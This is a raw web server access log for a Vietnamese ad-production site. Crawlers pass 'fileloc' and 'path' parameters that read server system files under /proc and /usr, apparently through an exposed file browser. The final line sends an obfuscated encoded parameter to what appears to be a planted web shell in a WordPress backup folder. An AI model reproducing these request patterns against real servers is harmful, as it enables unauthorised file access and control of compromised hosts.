216.73.216.50 - - [09/Nov/2025:01:12:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Flxd%2F24061%2Fshare%2Fopenvswitch%2Fpython%2Fovstest%2Ftests.py&path=%2F%2Fsnap%2Flxd%2F24061%2Fshare%2Fopenvswitch%2Fpython%2Fovstest HTTP/1.0" 200 5183 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FLoader%2FParamConfigurator.php&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FLoader HTTP/1.0" 200 3254 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:20 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm%2Fsignal.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm HTTP/1.0" 200 3180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:20 +0000] "GET /q-~146EHTGmJJWeEjJ0hO4QDAgXcXrSrdR6C8251/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:21 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Flib%2Fpython3.8%2Funittest%2F__pycache__%2Fcase.cpython-38.pyc&path=%2F%2Fusr%2Flib%2Fpython3.8%2Funittest%2F__pycache__ HTTP/1.0" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
18.211.148.239 - - [09/Nov/2025:01:12:21 +0000] "GET /our-works/tvc-bia-hello/?path=//sys/module/ip_tables/holders HTTP/1.0" 200 2895 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:12:21 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory11/node0/subsystem/drivers HTTP/1.0" 200 2962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:22 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fpprint.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 7613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fcommand%2Fbdist_wininst.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fcommand HTTP/1.0" 200 7653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest%2Fprocess_getenv.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest HTTP/1.0" 200 3041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:23 +0000] "GET /q-~219ZeFzPaCxZGkwz6hnnZG1NTzlgYLEQB23134/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:23 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest%2Ftest_paths.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Ftest HTTP/1.0" 200 18474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:24 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/node0/hugepages HTTP/1.0" 200 3264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fzope%2Finterface%2Fadvice.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fzope%2Finterface HTTP/1.0" 200 5807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:24 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Femail%2Fiterators.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Femail HTTP/1.0" 200 3774 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.44.174.136 - - [09/Nov/2025:01:12:25 +0000] "GET /our-works/tvc-jokky/?path=//usr/share/doc/fonts-ubuntu-console HTTP/1.0" 200 3288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:25 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FExtUtils%2FMiniperl.pm&path=%2F%2Fusr%2Fshare%2Fperl%2F5.30%2FExtUtils HTTP/1.0" 200 6296 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:25 +0000] "GET /q-~188J9JFqknmMQTYn6bUHNiCcFqzUBfKxZ31465/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm%2Felf.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm HTTP/1.0" 200 3989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:26 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory10/power HTTP/1.0" 200 3557 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:26 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Flib%2Flockdep%2Ftests%2Funlock_balance.sh&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Flib%2Flockdep%2Ftests HTTP/1.0" 200 2934 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:27 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fmfd%2Fabx500%2Fux500_chargalg.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fmfd%2Fabx500 HTTP/1.0" 200 3477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:27 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit%2Fconfig%2Fcc_phone_home.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fcloudinit%2Fconfig HTTP/1.0" 200 4922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:27 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fuaclient%2Fentitlements%2Flivepatch.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fuaclient%2Fentitlements HTTP/1.0" 200 6345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:27 +0000] "GET /q-~124C8jJYWWnTMMbwndSFhb1yEAsrBe7LS9879/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:28 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3.9%2Fdistutils%2Fcommand%2Fbuild_py.py&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3.9%2Fdistutils%2Fcommand HTTP/1.0" 200 7716 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:28 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory14/node0/memory7/node0 HTTP/1.0" 200 4167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.221.37.41 - - [09/Nov/2025:01:12:28 +0000] "GET /our-works/tvc-sjc/?path=//sys/module/xen HTTP/1.0" 200 3235 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:28 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Finclude%2Fasm%2Fvfp.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Finclude%2Fasm HTTP/1.0" 200 3780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:29 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm%2Firq.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fh8300%2Finclude%2Fasm HTTP/1.0" 200 3137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:29 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fsimplejson%2Ftests%2Ftest_errors.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fsimplejson%2Ftests HTTP/1.0" 200 3393 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:30 +0000] "GET /q-~16ghCMk2s1SzJSvDHOVQnadJvrMQ9BgP23683/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:30 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fctypes%2F_endian.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fctypes HTTP/1.0" 200 3621 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:30 +0000] "GET /?fileloc=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/compact&path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0 HTTP/1.0" 200 2894 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:30 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fmux%2Fconsumer.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fmux HTTP/1.0" 200 3241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.131.139 - - [09/Nov/2025:01:12:31 +0000] "GET /q-~68pCp8TlYclvHKxp5Brhz16iEd7pNfgV28635/ HTTP/1.0" 200 4760 "https://lamphimquangcao.net/sitemap362.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.50 - - [09/Nov/2025:01:12:31 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fkernel%2FKconfig.locks&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fkernel HTTP/1.0" 200 3625 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:31 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fsh%2Finclude%2Fasm%2Fbitops-grb.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fsh%2Finclude%2Fasm HTTP/1.0" 200 3748 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fusb%2Fof.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fusb HTTP/1.0" 200 3436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:32 +0000] "GET /q-~218LJi5bMASutSpjOJ0oYQPxVPoGosZwM11533/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:32 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fuapi%2Flinux%2Fatm_idt77105.h&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fuapi%2Flinux HTTP/1.0" 200 3349 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:32 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0 HTTP/1.0" 200 4144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:33 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm%2Fbitfield.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 12160 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:33 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fclick%2Fglobals.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fclick HTTP/1.0" 200 3575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.195.50.71 - - [09/Nov/2025:01:12:33 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/class/graphics/fbcon HTTP/1.0" 200 3391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:34 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__%2Fsynchronize.cpython-38.pyc&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__ HTTP/1.0" 200 2904 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:34 +0000] "GET /q-~74I868yDmTzPurfQVFsjzXHupXOCtbaC17591/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:34 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fversion.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fdistutils HTTP/1.0" 200 7081 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:35 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Flandscape%2Flib%2Fjuju.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Flandscape%2Flib HTTP/1.0" 200 3281 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:35 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fhexagon%2Finclude%2Fasm%2Fsyscall.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fhexagon%2Finclude%2Fasm HTTP/1.0" 200 3360 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:35 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory8 HTTP/1.0" 200 3611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:35 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2FSimpleGtk3builderApp.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 3882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:36 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8%2Fsignal.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.8 HTTP/1.0" 200 3512 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:36 +0000] "GET /q-~49JYzzOFNlMiofubKUo1FwxSTXvKK00l17320/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:36 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Fscripts%2Ftracing%2Fftrace-bisect.sh&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Fscripts%2Ftracing HTTP/1.0" 200 4484 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:37 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents%2Fiommu.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Ftrace%2Fevents HTTP/1.0" 200 3707 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:37 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Fdrm%2Fttm%2Fttm_module.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Finclude%2Fdrm%2Fttm HTTP/1.0" 200 3777 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
41.128.72.132 - - [09/Nov/2025:01:12:38 +0000] "GET /wp-json/wp/v2/posts HTTP/1.0" 200 4759 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
54.235.158.162 - - [09/Nov/2025:01:12:38 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//usr/lib/cgi-bin/php&path=//usr/lib/cgi-bin HTTP/1.0" 200 2830 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:12:39 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/memory1 HTTP/1.0" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:39 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fdtc%2Finclude-prefixes%2Fdt-bindings%2Fnet HTTP/1.0" 200 3344 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:40 +0000] "GET /q-~180EZOuCxpQMWQJ1AIb4qJBWhLZaaiTtE32859/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:40 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fc6x%2Finclude%2Fasm%2Fspecial_insns.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Fc6x%2Finclude%2Fasm HTTP/1.0" 200 3547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.248.20 - - [09/Nov/2025:01:10:20 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635343232302p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303632302q3434643932653531633136643930613761346230393962393036323139653230222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
